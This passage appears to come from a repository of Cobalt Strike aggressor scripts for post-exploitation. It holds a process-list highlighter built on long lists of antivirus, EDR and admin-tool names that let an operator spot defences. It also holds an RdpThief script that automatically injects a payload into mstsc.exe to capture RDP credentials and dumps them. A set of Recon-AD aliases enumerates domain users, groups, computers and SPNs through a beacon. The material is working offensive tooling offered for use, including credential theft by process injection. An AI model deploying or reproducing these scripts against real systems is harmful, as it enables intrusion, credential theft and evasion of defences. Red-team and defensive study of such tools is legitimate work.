"dllreg.exe", "doors.exe", "doscan.exe", "dpf.exe", "dpfsetup.exe", "dpps2.exe", "drwagntd.exe", "drwatson.exe", "drweb.exe", "drweb32.exe", "drweb32w.exe", "drweb386.exe", "drwebcgp.exe", "drwebcom.exe", "drwebdc.exe", "drwebmng.exe", "drwebscd.exe", "drwebupw.exe", "drwebwcl.exe", "drwebwin.exe", "drwupgrade.exe", "dsmain.exe", "dssagent.exe", "dvp95.exe", "dvp95_0.exe", "dwengine.exe", "dwhwizrd.exe", "dwwin.exe", "ecengine.exe", "edisk.exe", "efpeadm.exe", "egui.exe", "ekrn.exe", "elogsvc.exe", "emet_agent.exe", "emet_service.exe", "emsw.exe", "engineserver.exe", "ent.exe", "era.exe", "esafe.exe", "escanhnt.exe", "escanv95.exe", "esecagntservice.exe", "esecservice.exe", "esmagent.exe", "espwatch.exe", "etagent.exe", "ethereal.exe", "etrustcipe.exe", "evpn.exe", "evtProcessEcFile.exe", "evtarmgr.exe", "evtmgr.exe", "exantivirus-cnet.exe", "exe.avxw.exe", "execstat.exe", "expert.exe", "explore.exe", "f-agnt95.exe", "f-prot.exe", "f-prot95.exe", "f-stopw.exe", "fameh32.exe", "fast.exe", "fch32.exe", "fih32.exe", "findviru.exe", "firesvc.exe", "firetray.exe", "firewall.exe", "fmon.exe", "fnrb32.exe", "fortifw.exe", "fp-win.exe", "fp-win_trial.exe", "fprot.exe", "frameworkservice.exe", "frminst.exe", "frw.exe", "fsaa.exe", "fsaua.exe", "fsav.exe", "fsav32.exe", "fsav530stbyb.exe", "fsav530wtbyb.exe", "fsav95.exe", "fsavgui.exe", "fscuif.exe", "fsdfwd.exe", "fsgk32.exe", "fsgk32st.exe", "fsguidll.exe", "fsguiexe.exe", "fshdll32.exe", "fsm32.exe", "fsma32.exe", "fsmb32.exe", "fsorsp.exe", "fspc.exe", "fspex.exe", "fsqh.exe", "fssm32.exe", "fwinst.exe", "gator.exe", "gbmenu.exe", "gbpoll.exe", "gcascleaner.exe", "gcasdtserv.exe", "gcasinstallhelper.exe", "gcasnotice.exe", "gcasserv.exe", "gcasservalert.exe", "gcasswupdater.exe", "generics.exe", "gfireporterservice.exe", "ghost_2.exe", "ghosttray.exe", "giantantispywaremain.exe", "giantantispywareupdater.exe", "gmt.exe", "guard.exe", "guarddog.exe", "guardgui.exe", "hacktracersetup.exe", "hbinst.exe", "hbsrv.exe", 
"hipsvc.exe", "hotactio.exe", "hotpatch.exe", "htlog.exe", "htpatch.exe", "hwpe.exe", "hxdl.exe", "hxiul.exe", "iamapp.exe", "iamserv.exe", "iamstats.exe", "ibmasn.exe", "ibmavsp.exe", "icepack.exe", "icload95.exe", "icloadnt.exe", "icmon.exe", "icsupp95.exe", "icsuppnt.exe", "idle.exe", "iedll.exe", "iedriver.exe", "iface.exe", "ifw2000.exe", "igateway.exe", "inetlnfo.exe", "infus.exe", "infwin.exe", "inicio.exe", "init.exe", "inonmsrv.exe", "inorpc.exe", "inort.exe", "inotask.exe", "intdel.exe", "intren.exe", "iomon98.exe", "isPwdSvc.exe", "isUAC.exe", "isafe.exe", "isafinst.exe", "issvc.exe", "istsvc.exe", "jammer.exe", "jdbgmrg.exe", "jedi.exe", "kaccore.exe", "kansgui.exe", "kansvr.exe", "kastray.exe", "kav.exe", "kav32.exe", "kavfs.exe", "kavfsgt.exe", "kavfsrcn.exe", "kavfsscs.exe", "kavfswp.exe", "kavisarv.exe", "kavlite40eng.exe", "kavlotsingleton.exe", "kavmm.exe", "kavpers40eng.exe", "kavpf.exe", "kavshell.exe", "kavss.exe", "kavstart.exe", "kavsvc.exe", "kavtray.exe", "kazza.exe", "keenvalue.exe", "kerio-pf-213-en-win.exe", "kerio-wrl-421-en-win.exe", "kerio-wrp-421-en-win.exe", "kernel32.exe", "killprocesssetup161.exe", "kis.exe", "kislive.exe", "kissvc.exe", "klnacserver.exe", "klnagent.exe", "klserver.exe", "klswd.exe", "klwtblfs.exe", "kmailmon.exe", "knownsvr.exe", "kpf4gui.exe", "kpf4ss.exe", "kpfw32.exe", "kpfwsvc.exe", "krbcc32s.exe", "kvdetech.exe", "kvolself.exe", "kvsrvxp.exe", "kvsrvxp_1.exe", "kwatch.exe", "kwsprod.exe", "kxeserv.exe", "launcher.exe", "ldnetmon.exe", "ldpro.exe", "ldpromenu.exe", "ldscan.exe", "leventmgr.exe", "livesrv.exe", "lmon.exe", "lnetinfo.exe", "loader.exe", "localnet.exe", "lockdown.exe", "lockdown2000.exe", "log_qtine.exe", "lookout.exe", "lordpe.exe", "lsetup.exe", "luall.exe", "luau.exe", "lucallbackproxy.exe", "lucoms.exe", "lucomserver.exe", "lucoms~1.exe", "luinit.exe", "luspt.exe", "makereport.exe", "mantispm.exe", "mapisvc32.exe", "masalert.exe", "massrv.exe", "mcafeefire.exe", "mcagent.exe", 
"mcappins.exe", "mcconsol.exe", "mcdash.exe", "mcdetect.exe", "mcepoc.exe", "mcepocfg.exe", "mcinfo.exe", "mcmnhdlr.exe", "mcmscsvc.exe", "mcods.exe", "mcpalmcfg.exe", "mcpromgr.exe", "mcregwiz.exe", "mcscript.exe", "mcscript_inuse.exe", "mcshell.exe", "mcshield.exe", "mcshld9x.exe", "mcsysmon.exe", "mctool.exe", "mctray.exe", "mctskshd.exe", "mcuimgr.exe", "mcupdate.exe", "mcupdmgr.exe", "mcvsftsn.exe", "mcvsrte.exe", "mcvsshld.exe", "mcwce.exe", "mcwcecfg.exe", "md.exe", "mfeann.exe", "mfevtps.exe", "mfin32.exe", "mfw2en.exe", "mfweng3.02d30.exe", "mgavrtcl.exe", "mgavrte.exe", "mghtml.exe", "mgui.exe", "minilog.exe", "mmod.exe", "monitor.exe", "monsvcnt.exe", "monsysnt.exe", "moolive.exe", "mostat.exe", "mpcmdrun.exe", "mpf.exe", "mpfagent.exe", "mpfconsole.exe", "mpfservice.exe", "mpftray.exe", "mps.exe", "mpsevh.exe", "mpsvc.exe", "mrf.exe", "mrflux.exe", "msapp.exe", "msascui.exe", "msbb.exe", "msblast.exe", "mscache.exe", "msccn32.exe", "mscifapp.exe", "mscman.exe", "msconfig.exe", "msdm.exe", "msdos.exe", "msiexec16.exe", "mskagent.exe", "mskdetct.exe", "msksrver.exe", "msksrvr.exe", "mslaugh.exe", "msmgt.exe", "msmpeng.exe", "msmsgri32.exe", "msscli.exe", "msseces.exe", "mssmmc32.exe", "msssrv.exe", "mssys.exe", "msvxd.exe", "mu0311ad.exe", "mwatch.exe", "myagttry.exe", "n32scanw.exe", "nSMDemf.exe", "nSMDmon.exe", "nSMDreal.exe", "nSMDsch.exe", "naPrdMgr.exe", "nav.exe", "navap.navapsvc.exe", "navapsvc.exe", "navapw32.exe", "navdx.exe", "navlu32.exe", "navnt.exe", "navstub.exe", "navw32.exe", "navwnt.exe", "nc2000.exe", "ncinst4.exe", "MSASCuiL.exe"); 11 | @av1 = @("MBAMService.exe", "mbamtray.exe", "CylanceSvc.exe", "ndd32.exe", "ndetect.exe", "neomonitor.exe", "neotrace.exe", "neowatchlog.exe", "netalertclient.exe", "netarmor.exe", "netcfg.exe", "netd32.exe", "netinfo.exe", "netmon.exe", "netscanpro.exe", "netspyhunter-1.2.exe", "netstat.exe", "netutils.exe", "networx.exe", "ngctw32.exe", "ngserver.exe", "nip.exe", "nipsvc.exe", "nisoptui.exe", 
"nisserv.exe", "nisum.exe", "njeeves.exe", "nlsvc.exe", "nmain.exe", "nod32.exe", "nod32krn.exe", "nod32kui.exe", "normist.exe", "norton_internet_secu_3.0_407.exe", "notstart.exe", "npf40_tw_98_nt_me_2k.exe", "npfmessenger.exe", "npfmntor.exe", "npfmsg.exe", "nprotect.exe", "npscheck.exe", "npssvc.exe", "nrmenctb.exe", "nsched32.exe", "nscsrvce.exe", "nsctop.exe", "nsmdtr.exe", "nssys32.exe", "nstask32.exe", "nsupdate.exe", "nt.exe", "ntcaagent.exe", "ntcadaemon.exe", "ntcaservice.exe", "ntrtscan.exe", "ntvdm.exe", "ntxconfig.exe", "nui.exe", "nupgrade.exe", "nvarch16.exe", "nvc95.exe", "nvcoas.exe", "nvcsched.exe", "nvsvc32.exe", "nwinst4.exe", "nwservice.exe", "nwtool16.exe", "nymse.exe", "oasclnt.exe", "oespamtest.exe", "ofcdog.exe", "ofcpfwsvc.exe", "okclient.exe", "olfsnt40.exe", "ollydbg.exe", "onsrvr.exe", "op_viewer.exe", "opscan.exe", "optimize.exe", "ostronet.exe", "otfix.exe", "outpost.exe", "outpostinstall.exe", "outpostproinstall.exe", "paamsrv.exe", "padmin.exe", "pagent.exe", "pagentwd.exe", "panixk.exe", "patch.exe", "pavbckpt.exe", "pavcl.exe", "pavfires.exe", "pavfnsvr.exe", "pavjobs.exe", "pavkre.exe", "pavmail.exe", "pavprot.exe", "pavproxy.exe", "pavprsrv.exe", "pavsched.exe", "pavsrv50.exe", "pavsrv51.exe", "pavsrv52.exe", "pavupg.exe", "pavw.exe", "pccNT.exe", "pccclient.exe", "pccguide.exe", "pcclient.exe", "pccnt.exe", "pccntmon.exe", "pccntupd.exe", "pccpfw.exe", "pcctlcom.exe", "pccwin98.exe", "pcfwallicon.exe", "pcip10117_0.exe", "pcscan.exe", "pctsAuxs.exe", "pctsGui.exe", "pctsSvc.exe", "pctsTray.exe", "pdsetup.exe", "pep.exe", "periscope.exe", "persfw.exe", "perswf.exe", "pf2.exe", "pfwadmin.exe", "pgmonitr.exe", "pingscan.exe", "platin.exe", "pmon.exe", "pnmsrv.exe", "pntiomon.exe", "pop3pack.exe", "pop3trap.exe", "poproxy.exe", "popscan.exe", "portdetective.exe", "portmonitor.exe", "powerscan.exe", "ppinupdt.exe", "ppmcativedetection.exe", "pptbc.exe", "ppvstop.exe", "pqibrowser.exe", "pqv2isvc.exe", "prevsrv.exe", 
"prizesurfer.exe", "prmt.exe", "prmvr.exe", "programauditor.exe", "proport.exe", "protectx.exe", "psctris.exe", "psh_svc.exe", "psimreal.exe", "psimsvc.exe", "pskmssvc.exe", "pspf.exe", "purge.exe", "pview.exe", "pviewer.exe", "pxemtftp.exe", "pxeservice.exe", "qclean.exe", "qconsole.exe", "qdcsfs.exe", "qoeloader.exe", "qserver.exe", "rapapp.exe", "rapuisvc.exe", "ras.exe", "rasupd.exe", "rav7.exe", "rav7win.exe", "rav8win32eng.exe", "ravmon.exe", "ravmond.exe", "ravstub.exe", "ravxp.exe", "ray.exe", "rb32.exe", "rcsvcmon.exe", "rcsync.exe", "realmon.exe", "reged.exe", "remupd.exe", "reportsvc.exe", "rescue.exe", "rescue32.exe", "rfwmain.exe", "rfwproxy.exe", "rfwsrv.exe", "rfwstub.exe", "rnav.exe", "rrguard.exe", "rshell.exe", "rsnetsvr.exe", "rstray.exe", "rtvscan.exe", "rtvscn95.exe", "rulaunch.exe", "saHookMain.exe", "safeboxtray.exe", "safeweb.exe", "sahagent.exescan32.exe", "sav32cli.exe", "save.exe", "savenow.exe", "savroam.exe", "savscan.exe", "savservice.exe", "sbserv.exe", "scam32.exe", "scan32.exe", "scan95.exe", "scanexplicit.exe", "scanfrm.exe", "scanmailoutlook.exe", "scanpm.exe", "schdsrvc.exe", "schupd.exe", "scrscan.exe", "seestat.exe", "serv95.exe", "setloadorder.exe", "setup_flowprotector_us.exe", "setupguimngr.exe", "setupvameeval.exe", "sfc.exe", "sgssfw32.exe", "sh.exe", "shellspyinstall.exe", "shn.exe", "showbehind.exe", "shstat.exe", "siteadv.exe", "smOutlookPack.exe", "smc.exe", "smoutlookpack.exe", "sms.exe", "smsesp.exe", "smss32.exe", "sndmon.exe", "sndsrvc.exe", "soap.exe", "sofi.exe", "softManager.exe", "spbbcsvc.exe", "spf.exe", "sphinx.exe", "spideragent.exe", "spiderml.exe", "spidernt.exe", "spiderui.exe", "spntsvc.exe", "spoler.exe", "spoolcv.exe", "spoolsv32.exe", "spyxx.exe", "srexe.exe", "srng.exe", "srvload.exe", "srvmon.exe", "ss3edit.exe", "sschk.exe", "ssg_4104.exe", "ssgrate.exe", "st2.exe", "stcloader.exe", "stinger.exe", "stopp.exe", "stwatchdog.exe", "supftrl.exe", "support.exe", "supporter5.exe", "svcGenericHost", 
"svcharge.exe", "svchostc.exe", "svchosts.exe", "svcntaux.exe", "svdealer.exe", "svframe.exe", "svtray.exe", "swdsvc.exe", "sweep95.exe", "sweepnet.sweepsrv.sys.swnetsup.exe", "sweepsrv.exe", "swnetsup.exe", "swnxt.exe", "swserver.exe", "symlcsvc.exe", "symproxysvc.exe", "symsport.exe", "symtray.exe", "symwsc.exe", "sysdoc32.exe", "sysedit.exe", "sysupd.exe", "taskmo.exe", "taumon.exe", "tbmon.exe", "tbscan.exe", "tc.exe", "tca.exe", "tclproc.exe", "tcm.exe", "tdimon.exe", "tds-3.exe", "tds2-98.exe", "tds2-nt.exe", "teekids.exe", "tfak.exe", "tfak5.exe", "tgbob.exe", "titanin.exe", "titaninxp.exe", "tmas.exe", "tmlisten.exe", "tmntsrv.exe", "tmpfw.exe", "tmproxy.exe", "tnbutil.exe", "tpsrv.exe", "tracesweeper.exe", "trickler.exe", "trjscan.exe", "trjsetup.exe", "trojantrap3.exe", "trupd.exe", "tsadbot.exe", "tvmd.exe", "tvtmd.exe", "udaterui.exe", "undoboot.exe", "unvet32.exe", "updat.exe", "updtnv28.exe", "upfile.exe", "upgrad.exe", "uplive.exe", "urllstck.exe", "usergate.exe", "usrprmpt.exe", "utpost.exe", "v2iconsole.exe", "v3clnsrv.exe", "v3exec.exe", "v3imscn.exe", "vbcmserv.exe", "vbcons.exe", "vbust.exe", "vbwin9x.exe", "vbwinntw.exe", "vcsetup.exe", "vet32.exe", "vet95.exe", "vetmsg.exe", "vettray.exe", "vfsetup.exe", "vir-help.exe", "virusmdpersonalfirewall.exe", "vnlan300.exe", "vnpc3000.exe", "vpatch.exe", "vpc32.exe", "vpc42.exe", "vpfw30s.exe", "vprosvc.exe", "vptray.exe", "vrv.exe", "vrvmail.exe", "vrvmon.exe", "vrvnet.exe", "vscan40.exe", "vscenu6.02d30.exe", "vsched.exe", "vsecomr.exe", "vshwin32.exe", "vsisetup.exe", "vsmain.exe", "vsmon.exe", "vsserv.exe", "vsstat.exe", "vstskmgr.exe", "vswin9xe.exe", "vswinntse.exe", "vswinperse.exe", "w32dsm89.exe", "w9x.exe", "watchdog.exe", "webdav.exe", "webproxy.exe", "webscanx.exe", "webtrap.exe", "webtrapnt.exe", "wfindv32.exe", "wfxctl32.exe", "wfxmod32.exe", "wfxsnt40.exe", "whoswatchingme.exe", "wimmun32.exe", "win-bugsfix.exe", "winactive.exe", "winmain.exe", "winnet.exe", "winppr32.exe", 
"winrecon.exe", "winroute.exe", "winservn.exe", "winssk32.exe", "winstart.exe", "winstart001.exe", "wintsk32.exe", "winupdate.exe", "wkufind.exe", "wnad.exe", "wnt.exe", "wradmin.exe", "wrctrl.exe", "wsbgate.exe", "wssfcmai.exe", "wupdater.exe", "wupdt.exe", "wyvernworksfirewall.exe", "xagt.exe", "xagtnotif.exe", "xcommsvr.exe", "xfilter.exe", "xpf202en.exe", "zanda.exe", "zapro.exe", "zapsetup3001.exe", "zatutor.exe", "zhudongfangyu.exe", "zlclient.exe", "zlh.exe", "zonalm2601.exe", "zonealarm.exe", "cb.exe", "MsMpEng.exe", "MsSense.exe", "CSFalconService.exe", "CSFalconContainer.exe", "redcloak.exe", "OmniAgent.exe"); 12 | @admin = @("MobaXterm.exe", "bash.exe", "git-bash.exe", "mmc.exe", "Code.exe", "notepad++.exe", "notepad.exe", "cmd.exe", "drwatson.exe", "DRWTSN32.EXE", "drwtsn32.exe", "dumpcap.exe", "ethereal.exe", "filemon.exe", "idag.exe", "idaw.exe", "k1205.exe", "loader32.exe", "netmon.exe", "netstat.exe", "netxray.exe", "NmWebService.exe", "nukenabber.exe", "portmon.exe", "powershell.exe", "PRTG Traffic Gr.exe", "PRTG Traffic Grapher.exe", "prtgwatchdog.exe", "putty.exe", "regmon.exe", "SystemEye.exe", "taskman.exe", "TASKMGR.EXE", "tcpview.exe", "Totalcmd.exe", "TrafMonitor.exe", "windbg.exe", "winobj.exe", "wireshark.exe", "WMonAvNScan.exe", "WMonAvScan.exe", "WMonSrv.exe","regedit.exe", "regedit32.exe", "accesschk.exe", "accesschk64.exe", "AccessEnum.exe", "ADExplorer.exe", "ADInsight.exe", "adrestore.exe", "Autologon.exe", "Autoruns.exe", "Autoruns64.exe", "autorunsc.exe", "autorunsc64.exe", "Bginfo.exe", "Bginfo64.exe", "Cacheset.exe", "Clockres.exe", "Clockres64.exe", "Contig.exe", "Contig64.exe", "Coreinfo.exe", "ctrl2cap.exe", "Dbgview.exe", "Desktops.exe", "disk2vhd.exe", "diskext.exe", "diskext64.exe", "Diskmon.exe", "DiskView.exe", "du.exe", "du64.exe", "efsdump.exe", "FindLinks.exe", "FindLinks64.exe", "handle.exe", "handle64.exe", "hex2dec.exe", "hex2dec64.exe", "junction.exe", "junction64.exe", "ldmdump.exe", "Listdlls.exe", 
"Listdlls64.exe", "livekd.exe", "livekd64.exe", "LoadOrd.exe", "LoadOrd64.exe", "LoadOrdC.exe", "LoadOrdC64.exe", "logonsessions.exe", "logonsessions64.exe", "movefile.exe", "movefile64.exe", "notmyfault.exe", "notmyfault64.exe", "notmyfaultc.exe", "notmyfaultc64.exe", "ntfsinfo.exe", "ntfsinfo64.exe", "pagedfrg.exe", "pendmoves.exe", "pendmoves64.exe", "pipelist.exe", "pipelist64.exe", "portmon.exe", "procdump.exe", "procdump64.exe", "procexp.exe", "procexp64.exe", "Procmon.exe", "PsExec.exe", "PsExec64.exe", "psfile.exe", "psfile64.exe", "PsGetsid.exe", "PsGetsid64.exe", "PsInfo.exe", "PsInfo64.exe", "pskill.exe", "pskill64.exe", "pslist.exe", "pslist64.exe", "PsLoggedon.exe", "PsLoggedon64.exe", "psloglist.exe", "pspasswd.exe", "pspasswd64.exe", "psping.exe", "psping64.exe", "PsService.exe", "PsService64.exe", "psshutdown.exe", "pssuspend.exe", "pssuspend64.exe", "RAMMap.exe", "RegDelNull.exe", "RegDelNull64.exe", "regjump.exe", "ru.exe", "ru64.exe", "sdelete.exe", "sdelete64.exe", "ShareEnum.exe", "ShellRunas.exe", "sigcheck.exe", "sigcheck64.exe", "streams.exe", "streams64.exe", "strings.exe", "strings64.exe", "sync.exe", "sync64.exe", "Sysmon.exe", "Sysmon64.exe", "Tcpvcon.exe", "Tcpview.exe", "Testlimit.exe", "Testlimit64.exe", "vmmap.exe", "Volumeid.exe", "Volumeid64.exe", "whois.exe", "whois64.exe", "Winobj.exe", "ZoomIt.exe", "KeePass.exe", "1Password.exe", "lastpass.exe"); 13 | 14 | local('$outps $temp $name $ppid $pid $arch $user $session @ps'); 15 | $outps .= "\cC[*]\o Process List with process highlighting\n"; 16 | $outps .= "\cC[*]\o Current Running PID: \c8 Yellow ". $bd['pid'] ." 
\o \n"; 17 | $outps .= "\cC[*]\o Explorer/Winlogon: \c2 BLUE \o \n"; 18 | $outps .= "\cC[*]\o Admin Tools: \cB LIGHT BLUE \o \n"; 19 | $outps .= "\cC[*]\o Browsers: \c3 GREEN \o \n"; 20 | $outps .= "\cC[*]\o AV/EDR: \c4 RED \o \n\n"; 21 | $outps .= " PID PPID Name Arch Session User\n"; 22 | $outps .= "\cE --- ---- ---- ---- ------- -----\n"; 23 | 24 | foreach $temp (split("\n", ["$2" trim])) { 25 | ($name, $ppid, $pid, $arch, $user, $session) = split("\t", $temp); 26 | # highlight AV processes in RED. 27 | if(iff($name in @av,true,false)) { 28 | push(@ps, %(pid => $pid, entry => "\c4 $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user \o")); 29 | # highlight current process in YELLOW 30 | } else if ($pid eq $bd['pid']) { 31 | push(@ps, %(pid => $pid, entry => "\c8 $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user \o")); 32 | # highlight explorer , winlogon in BLUE 33 | } else if ($name eq "explorer.exe" || $name eq "winlogon.exe") { 34 | push(@ps, %(pid => $pid, entry => "\c2 $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user \o")); 35 | # highlight browsers processes in GREEN 36 | } else if ($name eq "chrome.exe" || $name eq "firefox.exe" || $name eq "iexplore.exe" || $name eq "MicrosoftEdgeCP.exe" || $name eq "MicrosoftEdge.exe") { 37 | push(@ps, %(pid => $pid, entry => "\c3 $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user \o")); 38 | # highlight av1 processes in RED. 
39 | } else if(iff($name in @av1,true,false)) { 40 | push(@ps, %(pid => $pid, entry => "\c4 $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user \o")); 41 | # highlight Admin Tools in Light Blue 42 | } else if(iff($name in @admin,true,false)) { 43 | push(@ps, %(pid => $pid, entry => "\cB $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user \o")); 44 | } else { 45 | push(@ps, %(pid => $pid, entry => " $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user")); 46 | } 47 | } 48 | # sort the processes please 49 | sort({ return $1['pid'] <=> $2['pid']; }, @ps); 50 | # append to our outstring 51 | foreach $temp (@ps) { 52 | $outps .= "$temp['entry'] \n"; 53 | } 54 | return $outps; 55 | } 56 | -------------------------------------------------------------------------------- /scripts/cmd/RdpThief.cna: -------------------------------------------------------------------------------- 1 | @beacons = @(); 2 | @pids = @(); 3 | 4 | on heartbeat_5s{ 5 | 6 | foreach $index => $beaconid (@beacons) 7 | { 8 | 9 | bps($beaconid,&handleProcess); 10 | } 11 | 12 | } 13 | 14 | 15 | sub handleProcess{ 16 | 17 | $processList = $2; 18 | $index = indexOf($processList, "mstsc.exe", 0) + 9; 19 | 20 | if($index > 9){ 21 | 22 | $temp = substr($processList,$index,-1); 23 | $pid = split("\t",$temp)[2]; 24 | 25 | if ($pid !in @pids){ 26 | add(@pids,$pid,0); 27 | blog($1,"Injecting into mstsc.exe with PID: $pid"); 28 | bshinject($1, $pid , "x64" ,script_resource("exe/RdpThief_x64.tmp")); 29 | } 30 | 31 | } 32 | 33 | 34 | 35 | } 36 | 37 | alias rdpthief_enable { 38 | 39 | blog($1, "RdpThief enabled \n"); 40 | add(@beacons,$1,0); 41 | 42 | } 43 | 44 | 45 | alias rdpthief_disable { 46 | 47 | blog($1, "Disabling RdpThief"); 48 | remove(@beacons,$1); 49 | } 50 | alias rdpthief_dump { 51 | bshell($1,"type %temp%\\data.bin") 52 | } 53 | 54 | -------------------------------------------------------------------------------- /scripts/cmd/Recon-AD.cna: 
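--------------------------------------------------------------------------------
#Recon-AD
#author Cornelis de Plaa
#@outflank.nl

#Using Active Directory Service Interfaces (ADSI) to query Active Directory objects and corresponding attributes.
#Each alias spawns the matching Recon-AD DLL via bdllspawn and passes it a filter built from the
#operator's arguments. All working variables are declared local so one invocation's arguments can
#never leak into a later command issued from another beacon.

#register help
beacon_command_register("Recon-AD-Domain", "Using Active Directory Domain Services to enumerate domain information.",
    "Using Active Directory Domain Services to enumerate domain information.\n\n" .
    "Synopsis: Recon-AD-Domain\n\n");

beacon_command_register("Recon-AD-Users", "Use ADSI to query Active Directory user objects and attributes.",
    "Use Active Directory Service Interfaces (ADSI) to query user objects and corresponding attributes.\n\n" .
    "Synopsis: Recon-AD-Users [username], to query a specific user object including attributes.\n" .
    " Recon-AD-Users [*admin*], to query for usernames containing admin.\n" .
    " Recon-AD-Users All, to query all user objects including attributes.\n");

beacon_command_register("Recon-AD-Computers", "Use ADSI to query Active Directory computer objects and attributes.",
    "Use Active Directory Service Interfaces (ADSI) to query computer objects and corresponding attributes.\n\n" .
    "Synopsis: Recon-AD-Computers [computername], to query a specific computer object including attributes.\n" .
    " Recon-AD-Computers [*dc*], to query for computernames containing dc.\n" .
    " Recon-AD-Computers All, to query all computer objects including attributes.\n");

beacon_command_register("Recon-AD-Groups", "Use ADSI to query Active Directory group objects and attributes.",
    "Use Active Directory Service Interfaces (ADSI) to query group objects and corresponding attributes.\n\n" .
    "Synopsis: Recon-AD-Groups [groupname], to query a specific group object including attributes.\n" .
    " Recon-AD-Groups [*admin*], to query for groupnames containing admin.\n" .
    " Recon-AD-Groups All, to query all group objects including attributes.\n");

beacon_command_register("Recon-AD-LocalGroups", "Use ADSI to query a computer for specific localgroups.",
    "Use Active Directory Service Interfaces (ADSI) to query a computer for specific localgroups (default Administrators group).\n\n" .
    "Synopsis: Recon-AD-LocalGroups [computername] [groupname], to query a specific computer and localgroup.\n");

beacon_command_register("Recon-AD-AllLocalGroups", "Use ADSI to query a computer for all localgroups.",
    "Use Active Directory Service Interfaces (ADSI) to query a computer for all localgroups.\n\n" .
    "Synopsis: Recon-AD-AllLocalGroups [computername], to query a specific computer for all localgroups.\n");

beacon_command_register("Recon-AD-SPNs", "Use ADSI to query Active Directory user objects with Service Principal Names (SPN) configured.",
    "Use Active Directory Service Interfaces (ADSI) to query user objects with Service Principal Names (SPN) configured.\n\n" .
    "Synopsis: Recon-AD-SPNs\n\n");


# Recon-AD-Domain: no arguments, the DLL is launched with an empty filter.
alias Recon-AD-Domain {
    local('$bid');
    $bid = $1;
    blog($bid, "Let's enumerate the domain\n");
    bdllspawn($bid, script_resource("exe/Recon-AD-Domain.dll"), "", "Recon-AD-Domain", 5000, false);
}

# Recon-AD-Users [username|*pattern*|All]
alias Recon-AD-Users {
    local('$bid $input @args $object $param');
    $bid = $1;

    # $0 holds the full command line; drop the 15-character "Recon-AD-Users " prefix.
    $input = substr($0, 15);
    @args = split(' ', $input);
    $object = @args[0];

    if ($object eq "") {
        berror($bid, "Please specify a username or all.");
        return;
    }
    else if (lc($object) eq "all") {
        # The help text documents "All"; the comparison is case-insensitive so either spelling works.
        blog($bid, "Let's enumerate all users\n");
        bdllspawn($bid, script_resource("exe/Recon-AD-Users.dll"), "", "Recon-AD-Users", 5000, false);
    }
    else {
        # Wildcards such as *admin* pass straight through into the LDAP filter.
        $param = "(sAMAccountName=" . $object . ")";
        blog($bid, "Let's enumerate user " . $object . "\n");
        bdllspawn($bid, script_resource("exe/Recon-AD-Users.dll"), $param, "Recon-AD-Users", 5000, false);
    }
}

# Recon-AD-Computers [computername|*pattern*|All]
alias Recon-AD-Computers {
    local('$bid $input @args $object $param');
    $bid = $1;

    # Drop the 19-character "Recon-AD-Computers " prefix from the command line.
    $input = substr($0, 19);
    @args = split(' ', $input);
    $object = @args[0];

    if ($object eq "") {
        berror($bid, "Please specify a computername or all.");
        return;
    }
    else if (lc($object) eq "all") {
        blog($bid, "Let's enumerate all computers\n");
        bdllspawn($bid, script_resource("exe/Recon-AD-Computers.dll"), "", "Recon-AD-Computers", 5000, false);
    }
    else {
        $param = "(cn=" . $object . ")";
        blog($bid, "Let's enumerate computer " . $object . "\n");
        bdllspawn($bid, script_resource("exe/Recon-AD-Computers.dll"), $param, "Recon-AD-Computers", 5000, false);
    }
}

# Recon-AD-Groups [groupname|*pattern*|All]
alias Recon-AD-Groups {
    local('$bid $input @args $group $param');
    $bid = $1;

    # Drop the 16-character "Recon-AD-Groups " prefix from the command line.
    $input = substr($0, 16);
    @args = split(' ', $input);
    # Group names may contain spaces ("Domain Admins"), so every remaining token is
    # re-joined instead of stitching a fixed number of positional words together.
    $group = join(' ', @args);

    if ($group eq "") {
        berror($bid, "Please specify a groupname or all.");
        return;
    }
    if (lc(@args[0]) eq "all") {
        blog($bid, "Let's enumerate all groups\n");
        bdllspawn($bid, script_resource("exe/Recon-AD-Groups.dll"), "", "Recon-AD-Groups", 5000, false);
        # Stop here: without this return control fell through to the filtered spawn
        # below and launched the DLL a second time with a stale or empty $param.
        return;
    }
    $param = "(sAMAccountName=" . $group . ")";
    blog($bid, "Let's enumerate group " . $group . "\n");
    bdllspawn($bid, script_resource("exe/Recon-AD-Groups.dll"), $param, "Recon-AD-Groups", 5000, false);
}

# Recon-AD-AllLocalGroups [computername]
alias Recon-AD-AllLocalGroups {
    local('$bid $input @args $object');
    $bid = $1;

    # Drop the 24-character "Recon-AD-AllLocalGroups " prefix from the command line.
    $input = substr($0, 24);
    @args = split(' ', $input);
    $object = @args[0];

    if ($object eq "") {
        berror($bid, "Please specify a computername.");
        return;
    }
    # The computer name itself is the only argument the DLL takes.
    blog($bid, "Let's enumerate computer " . $object . " for localgroups\n");
    bdllspawn($bid, script_resource("exe/Recon-AD-AllLocalGroups.dll"), $object, "Recon-AD-AllLocalGroups", 5000, false);
}

# Recon-AD-LocalGroups [computername] [groupname]
alias Recon-AD-LocalGroups {
    local('$bid $input @args $computer $group $param');
    $bid = $1;

    # Drop the 21-character "Recon-AD-LocalGroups " prefix from the command line.
    $input = substr($0, 21);
    @args = split(' ', $input);
    $computer = @args[0];
    # Local group names may contain spaces; everything after the computername is the group.
    $group = join(' ', sublist(@args, 1));

    if ($computer eq "") {
        berror($bid, "Please specify a computername and localgroup.");
        return;
    }
    # The DLL receives "computername [groupname]"; per the registered help it falls back to
    # the Administrators group when no group name is supplied.
    $param = join(' ', @args);
    blog($bid, "Let's enumerate computer " . $computer . " for localgroup " . $group . "\n");
    bdllspawn($bid, script_resource("exe/Recon-AD-LocalGroups.dll"), $param, "Recon-AD-LocalGroups", 5000, false);
}

# Recon-AD-SPNs: fixed filter selecting every object with a servicePrincipalName set.
alias Recon-AD-SPNs {
    local('$bid');
    $bid = $1;
    blog($bid, "Let's enumerate all users with SPNs configured.\n");
    bdllspawn($bid, script_resource("exe/Recon-AD-SPNs.dll"), "servicePrincipalName=*", "Recon-AD-SPNs", 5000, false);
}
--------------------------------------------------------------------------------
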